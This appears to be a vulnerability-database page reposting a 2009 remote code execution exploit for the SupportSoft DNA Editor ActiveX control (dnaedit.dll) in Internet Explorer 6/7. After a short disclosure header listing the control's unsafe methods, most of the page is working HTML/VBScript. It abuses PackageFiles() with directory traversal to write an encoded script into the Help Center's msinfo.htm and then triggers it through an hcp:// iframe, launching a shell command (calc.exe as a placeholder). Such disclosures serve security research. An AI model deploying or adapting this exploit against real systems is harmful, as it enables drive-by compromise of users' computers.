Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:21447
HistoryMar 09, 2009 - 12:00 a.m.

SupportSoft DNA Editor Module (dnaedit.dll v6.9.2205) remote code execution exploit (IE6/7)

2009-03-0900:00:00
vulners.com
7
JSON

<!-- SupportSoft DNA Editor Module (dnaedit.dll v6.9.2205) remote code execution exploit (IE6/7)
by Nine:Situations:Group::bruiser

 vendor url: http://www.supportsoft.com/
 our site: http://retrogod.altervista.org/

 details:
 CLSID: {01110800-3E00-11D2-8470-0060089874ED}
 Progid: Tioga.Editor.1
 Binary Path: C:&#92;Programmi&#92;File comuni&#92;SupportSoft&#92;bin&#92;dnaedit.dll
 KillBitted: False
 Implements IObjectSafety: True
 Safe For Initialization &#40;IObjectSafety&#41;: True
 Safe For Scripting &#40;IObjectSafety&#41;: True

 vulnerabilities, discovered two months ago:
 insecure methods: Packagefiles&#40;&#41; - remote file overwrite, directory traversal, *script injection* and ... a crash &#40;investigating on this one&#41;
                   SaveDna&#40;&#41; - remote file creation, directory traversal
                   AddFile&#40;&#41; - remote cpu consumption
                   SetIdentity&#40;&#41; - remote file creation

 This dll was present inside the SupportSoft ActiveX Controls Security Update for a previous buffer overflow vulnerability,
 see: http://secunia.com/advisories/24246/
 My download url was: http://www.supportsoft.com/support/controls_update.asp
 actually unreachable
 see also: http://www.securityfocus.com/archive/1/archive/1/461147/100/0/threaded
 Well, they probably patched my marking them unsafe for initialization &#40;I see that the ScriptRunner module suffers  of a
 buffer overflow bug in the Evaluate&#40;&#41; method...&#41; but they gave you another vulnerable control...

–>
<HTML>
<OBJECT classid='clsid:01110800-3E00-11D2-8470-0060089874ED' width=1 height=1 id='DNAEditorCtl' />
</OBJECT>
<SCRIPT language='VBScript'>
<!–
sh="<HTML><SCRIPT LANGUAGE=VBScript>" + unescape("Execute%28unescape%28%22Set%20s%3DCreateObject%28%22%22WScript.Shell%22%22%29%250D%250As.Run%20%22%22cmd%20%252fc%20start%20calc%22%22%22%29%29") + "<" + Chr(47) + "SCRIPT><" + Chr(47) + "HTML>"
'file path is injected in msinfo.htm, you can see the code by an hex editor, some limit with number of chars, some problem with newlines, resolved with vbscript code evaluation by Execute(), a popup says Unable to post… click Ok or close it and you are pwned
DNAEditorCtl.PackageFiles sh + "…/…/…/…/…/…/…/…/…/WINDOWS/PCHEALTH/HELPCTR/System/sysinfo/msinfo.htm"
'launch the script and calc.exe trough the Help and Support Center Service
document.write("<iframe src=""hcp://system/sysinfo/msinfo.htm"">")
–>
</SCRIPT>

original url: http://retrogod.altervista.org/9sg_supportsoft_ce_l_hai_nel_dna.html

JSON